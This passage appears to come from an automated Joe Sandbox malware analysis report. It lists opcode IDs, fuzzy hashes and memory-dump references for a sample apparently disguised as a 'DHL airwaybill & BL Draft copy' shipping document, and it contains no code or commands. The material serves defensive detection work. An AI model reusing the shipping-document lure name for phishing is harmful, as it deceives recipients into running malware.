                • Instruction Fuzzy Hash: C9110436A00909AFDF1DCB68C845B9EBBF5EF84710F0582A9E84597340E771BD01CB80
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                • Instruction ID: 9455ca560d8d22fa9cc98454c7e31ea8303a382d527f72094b80bd5fa91e5873
                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                • Instruction Fuzzy Hash: BC2106B5A00B059FD3A0CF29D440B52BBF4FB48B10F10892EE98AC7B40E371E814CB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                • Instruction ID: dab4f23e505ecbb7219aae4c9f718407aa0d8b3065b6ee7833765d245d57dc4a
                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                • Instruction Fuzzy Hash: 0811C232610601EFEB39AF49C844B5EBBE5EF45B54F0584A8EA099B160EB71DC40DB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 909998d6418399ce2a1b865ee4b2cf2b9fb320ee7464ccd55156e35379aaee52
                • Instruction ID: 6147ee93e7f72b8f7e25ff1db3b82fafc60154ad751b78bc515dce24ee48b99e
                • Opcode Fuzzy Hash: 909998d6418399ce2a1b865ee4b2cf2b9fb320ee7464ccd55156e35379aaee52
                • Instruction Fuzzy Hash: C9010431205685ABEB1EA67D9C84F277A8CEFA0690F0501E5F904DB250DB58DC04C271
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04c256c9fab69b219e7de0241129c921171b5241214935c8c9cd36acf0b46375
                • Instruction ID: f466c0635ebfcf640ab198e76cfc4b878de06b6569395c2f0e5ed797101b45fc
                • Opcode Fuzzy Hash: 04c256c9fab69b219e7de0241129c921171b5241214935c8c9cd36acf0b46375
                • Instruction Fuzzy Hash: 0411A036200645AFDB2BCF5DD940B567FA8EB86764F004299FA048B6A0C770E800CF60
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5ae951af2ef4554ab0f948aab22bb206126e064341d7ccb51320fa48a60a2e26
                • Instruction ID: 6a0902ba307b03f32a2025cb97755c8eb55ce1d785f3a147386fadd89148bb05
                • Opcode Fuzzy Hash: 5ae951af2ef4554ab0f948aab22bb206126e064341d7ccb51320fa48a60a2e26
                • Instruction Fuzzy Hash: 431106322006119FDB2D9B29D840F26B7A6FFD4310F1545A9E686C7A50EB30A802CB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24f9668ceb42743fa9abcea0e4308d6177cb6bcde674bb5098212b89c9d9a460
                • Instruction ID: 87536961a04ad232ea923afd6ae8739c1063eb1a72cb3f84c919ab29c084f95f
                • Opcode Fuzzy Hash: 24f9668ceb42743fa9abcea0e4308d6177cb6bcde674bb5098212b89c9d9a460
                • Instruction Fuzzy Hash: 9711E572A00715BBDB2ADF59C9C0B9EFBB8FF84790F510098EA01A7244D730AE119B60
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a2c38d9f104fbfbde7e1077c6b11288a4c2627bbbcfe4fe8faabbe345fc21b86
                • Instruction ID: 62516a62790e7c96356e9c3be9644a68e2a249d211bbae90716b6ce0141f5d4a
                • Opcode Fuzzy Hash: a2c38d9f104fbfbde7e1077c6b11288a4c2627bbbcfe4fe8faabbe345fc21b86
                • Instruction Fuzzy Hash: 7F0192755011099FC729DB1AD444F16BBF9EB96314F2185AEE1098B2A4C770DC46CB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                • Instruction ID: cc85d1bb3e6a0cc2d991b0e9a91657a7e464a72149ccc75ccbeb860224b524ee
                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                • Instruction Fuzzy Hash: ED112F722126D19FEB2B975DD564B3577E8FF10754F1900E4DD4587692F32CC841C250
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                • Instruction ID: 9ad2482bb7af0e320bba9a4e8e6f3a0a431acc9a0b5a588c40bb55bd594baa36
                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                • Instruction Fuzzy Hash: FA01923A601105AFEB29BF58CC00F5A7EA9EB95F50F0585A4EA059B260E771DD40C790
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                • Instruction ID: 4024d5f8d282e75a8d0afbc5172cea53ee086580c766fc61587e4f8493e5728f
                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                • Instruction Fuzzy Hash: 42012636604B219BCB318F99E840AB27BB8EF55770700852DFED98B2A1C731D400CBA0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 147ba6f61c8e22daac0fb1c4d2ac3511c4da58797e271523dd72329ae898b1b0
                • Instruction ID: f9d653e9f38d952bc0c527e2134dffbccb6fac82d47df3c69b188cba8205119a
                • Opcode Fuzzy Hash: 147ba6f61c8e22daac0fb1c4d2ac3511c4da58797e271523dd72329ae898b1b0
                • Instruction Fuzzy Hash: 130126325412019FC73EDF1DC844E12BBA8EB81370B2542D5E9689B5AAF734D801C7C0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aef6d41181ae6b2cd64a369aa1c798f77776358a9d7a0badb88528d06a41761e
                • Instruction ID: c92acedfe0f3b83327463373dde8e069586068c3f36a986cea77f16065ae3901
                • Opcode Fuzzy Hash: aef6d41181ae6b2cd64a369aa1c798f77776358a9d7a0badb88528d06a41761e
                • Instruction Fuzzy Hash: D6118E31241241EFDB1AAF19C980F16BBB8FF58B54F1000E9E9059B6A1C735ED01CA90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c63409b228e81b8d30e56252bfded63ee02f07929c51690d371b1bc2a1072714
                • Instruction ID: 07814d6ffe539f9ab71716ee83fadd2ac2e036fb46cc38469bd9fc4f3dba581a
                • Opcode Fuzzy Hash: c63409b228e81b8d30e56252bfded63ee02f07929c51690d371b1bc2a1072714
                • Instruction Fuzzy Hash: 1F114870641229ABDF2AAB64CD42FE9B7B4AB18710F5081D4B318E61E1DB709A91DF84
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                • Instruction ID: c2dd7ed6a089408ad1276295f3681269cfbb1d620d43fd826a9661fd0cffc4ac
                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                • Instruction Fuzzy Hash: 2601F5322002108BEF1EDB1DD884B62BB6BFFC8610F5545E9ED05CF296EB718885C390
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 384dc6906c1d6d2fe92adb9c4729a0bbf77350d097ae6d0f0020d5e90797369d
                • Instruction ID: fe69931b47fb81c2064c9a3da547513ec65faf062ac2c3cdb5271e09f6c9d95b
                • Opcode Fuzzy Hash: 384dc6906c1d6d2fe92adb9c4729a0bbf77350d097ae6d0f0020d5e90797369d
                • Instruction Fuzzy Hash: 3D110576900019ABCB26EB94CC80EDFBB7DEF48354F054166A906A7211EB34AA15CBA0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad44136342d38aa4a0719577ca24c061470f93118235210db5f6d58190526932
                • Instruction ID: 021ae808aec5dceedb0cdbdfa17b1355c9e7c57752c8cceab6fa52b75b226269
                • Opcode Fuzzy Hash: ad44136342d38aa4a0719577ca24c061470f93118235210db5f6d58190526932
                • Instruction Fuzzy Hash: 3611C8766441499FDB15CF58D410BA5BBB9FB56314F0981A9E844CB325D731EC41CBA0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc766e423330d37f5a5cd7d71b8658976697c4165220a63b39673da24d7c3a99
                • Instruction ID: c3c20912ac44779d32a88ba505dfb83261356e394a764be1be5cd03fc3b07fe9
                • Opcode Fuzzy Hash: fc766e423330d37f5a5cd7d71b8658976697c4165220a63b39673da24d7c3a99
                • Instruction Fuzzy Hash: 91111CB1A00209DFCB04DF99D581AAEBBF4FF58250F14806AE905E7351D774EA01CBA4
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b293b908f90ad14cf2684fc401cf0813f9c1b991adae4017154cc68d9810d67f
                • Instruction ID: 72c8310444ebd20e702dcacb92503b20dbc93c37c600ba2beaf3e376baab880d
                • Opcode Fuzzy Hash: b293b908f90ad14cf2684fc401cf0813f9c1b991adae4017154cc68d9810d67f
                • Instruction Fuzzy Hash: 1901D8351442119BCB3EAB15C450D3ABBBAFF51650B9544EEE6455B221C730EC41CB91
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc6f29690f6cfd132af0d3cbf34b50f42bae2ad8518c54a24421974d17775495
                • Instruction ID: fd2341c4417dddc6ce03cd650f0b98bf50326f3b9038f230c641d236a3d6ef68
                • Opcode Fuzzy Hash: dc6f29690f6cfd132af0d3cbf34b50f42bae2ad8518c54a24421974d17775495
                • Instruction Fuzzy Hash: 48118C75A0120DAFDF09EFA5D850FAE7BB5EB44740F0080D9FA119B290EB35AE11DB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                • Instruction ID: d579a6b9ccee3f9005b9a7469a84400b7b41cf3dababccedab3442d7c8db07c5
                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                • Instruction Fuzzy Hash: 9801F5321007099FEF26A7AAD800FA777F9FFC5224F04499DAA468B554EB70E402C750
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: efb233684cce5d3be405ef21db89e5c6f8e127a045bda90f6a48bc96ac1988c1
                • Instruction ID: 08d90fd66a2112eea18ad69aa60a3f5bac1b801733c43ae578db076ce2d9cde4
                • Opcode Fuzzy Hash: efb233684cce5d3be405ef21db89e5c6f8e127a045bda90f6a48bc96ac1988c1
                • Instruction Fuzzy Hash: E001A272284701AFD7395B1AD881F02BAA8EF95B50F5144AEF7069F3A0D7B0E840CB94
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c235aedf9b72e66c79ae1319d3b24007ab36dc7665f5064e8108fd2599f0536f
                • Instruction ID: da4bad89edc45b317994fe07282e53a095f41a24b1b3ffee3c89220da7751155
                • Opcode Fuzzy Hash: c235aedf9b72e66c79ae1319d3b24007ab36dc7665f5064e8108fd2599f0536f
                • Instruction Fuzzy Hash: 14F0F932641710BBC73A9B568C44F57BEADEB84B90F1140A8AA0597650D730ED05C7A0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                • Instruction ID: 3edd3d271e664d8e2532487f5da0140bd2e946f4d63da6b6b52c1f9deac0e974
                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                • Instruction Fuzzy Hash: FEF0AFB2A00621ABD328CF4D9840E57FBEADBD5A80F058169E509C7220EA31DD04CB90
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                • Instruction ID: 425156ec4507914fe437b9a0de5f0ca2cb1f41e4f46a387ede32bf2ecb98c1a1
                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                • Instruction Fuzzy Hash: 85F0C8732046279BD73217EB8840F2BE5A5CFD5AB4F1A013DF3059B208CA608D0256D1
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6519bafd79af7e74a69f78c24c2de6cd4755bfd648aa13415081941c81a8f30f
                • Instruction ID: d2a2665ea6ca701e483e2496d44d72fe1cd7ee55e1b379eca32026d0a62cf91b
                • Opcode Fuzzy Hash: 6519bafd79af7e74a69f78c24c2de6cd4755bfd648aa13415081941c81a8f30f
                • Instruction Fuzzy Hash: 68014F71A10209EFDB08DFA9D591AAEB7F8FF58314F14406AF904E7350EB74DA019BA4
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29a8c59c060baf9d78892c9d7c469a5a1e4ad120e2d14a0cc56fd259bc738e91
                • Instruction ID: 90204903271329ed03c6df0654f329f45607bb7b043dd81962db9ef2afdefd72
                • Opcode Fuzzy Hash: 29a8c59c060baf9d78892c9d7c469a5a1e4ad120e2d14a0cc56fd259bc738e91
                • Instruction Fuzzy Hash: CA014471A00209EFDB08DFA9D581A9EB7F8FF58314F54805AF914E7351D7749D018BA4
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 100c86911da998974c512fea7e9d86f411688e7f820ede472c311294b63a5003
                • Instruction ID: 1eb049dda6806f7a33cbffe50f9dc9e137ed6b528e2751b7f77a5ff7defb4c05
                • Opcode Fuzzy Hash: 100c86911da998974c512fea7e9d86f411688e7f820ede472c311294b63a5003
                • Instruction Fuzzy Hash: 40014471A10219EFCB08DFA9D591AAEB7F8FF58304F54805AF904E7351D7749901CBA4
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                • Instruction ID: e1a4293a8e13823e1c208915347a7d1a6d8f7a9255cddf3babd3ec32fbe03ccd
                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                • Instruction Fuzzy Hash: 6C012832300689ABD73AA75DC849F59BFD9FF81750F0940E6FA149F6A1E7B8C811C260
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2477742896253558e091d2498e8a90e0466d3b09f348bd53b73a2d085726a8f6
                • Instruction ID: 0bdf0f1373c61a33db49e1de92bd2ac336024086a7027ab62e1f0f2d19a97794
                • Opcode Fuzzy Hash: 2477742896253558e091d2498e8a90e0466d3b09f348bd53b73a2d085726a8f6
                • Instruction Fuzzy Hash: 44014F71A00659ABDF08DFA9D545AEEBBF8FF58310F14409AE501E7390E774EA01CB94
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                • Instruction ID: 6479295a8db23cb03ce66f3e776038a1d1e84e84f61a1785a9a858fc0a39bcdd
                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                • Instruction Fuzzy Hash: 50F06D7220001DBFEF06AF94DD80DAF7BBEEB587A8B104164FA0092020D731DD21EBA0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 464ce4a442b9bff73e8ebe50d10f28530ea444e7a6de86757a454c4a934f8982
                • Instruction ID: 73eb2484047ab8ecc1d2ba6b62cbf1e1ddd8e5d0e66b69c3a48e7e756231763a
                • Opcode Fuzzy Hash: 464ce4a442b9bff73e8ebe50d10f28530ea444e7a6de86757a454c4a934f8982
                • Instruction Fuzzy Hash: 4A018936100149ABCF12AE94D840EDA3F66FB4CA64F058156FE1866220C332E9B0EB91
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7dc45223003642f1e6aeaaca45ab438b466c34bcc82196e8c806f47b9af9dae
                • Instruction ID: 4c5c1f3c614efaaca29a32c884f5990ff9b646a9e0efc61d295a9fff0f34050b
                • Opcode Fuzzy Hash: c7dc45223003642f1e6aeaaca45ab438b466c34bcc82196e8c806f47b9af9dae
                • Instruction Fuzzy Hash: 29F02B712043455BF718979A8C01F2237A9E7C07A4FA5806DFB058B2C5FA71DC118399
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e03432c2b3a28eb20af0cbe597498fafc13984927d6e434cb5c835f9a455b5e1
                • Instruction ID: 6e81b0e4260ecb9af26fed3459c782a09733128fb069b0c19a79075970d3c527
                • Opcode Fuzzy Hash: e03432c2b3a28eb20af0cbe597498fafc13984927d6e434cb5c835f9a455b5e1
                • Instruction Fuzzy Hash: ED01A970301685ABE73E9B2CCD88F2537D4FB40B44F4601E4FA11CB5E6D728D511C210
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                • Instruction ID: cb46a4395e2effaa8db67106cac5d8432676300f9b796e30c9cc165ae82a6f70
                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                • Instruction Fuzzy Hash: 3DF0E93534991347EB3DAA2E84A0B2FBAD5DFD0A01B4D45BC9605CB640DFA0D8048790
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 14cae016089235d2f7a6344c35a2f0507797685e315d2192c180c53ba86d596c
                • Instruction ID: c12a59d0a824373cc69aea4c3017ed13ba8063f1f6142c1f8abbf8617f49e3e4
                • Opcode Fuzzy Hash: 14cae016089235d2f7a6344c35a2f0507797685e315d2192c180c53ba86d596c
                • Instruction Fuzzy Hash: F4F0A4706193049FC714EF68C541A1ABBE4FF58710F84469AB894DB394E734E900C756
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                • Instruction ID: 42178f6bb9ba2fa2d82a3aca6a7473144c7ec6102f0fff6210b65aed87be8547
                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                • Instruction Fuzzy Hash: 6BF089337256119BD739AA4DCC80F1AB7A8EFD5E60F5A01A5A6049B264C760EC01C7D0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                • Instruction ID: 33171e44465e3ffd662b14420100b51a82c7d1987656d4d23adae00ecc02f6cf
                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
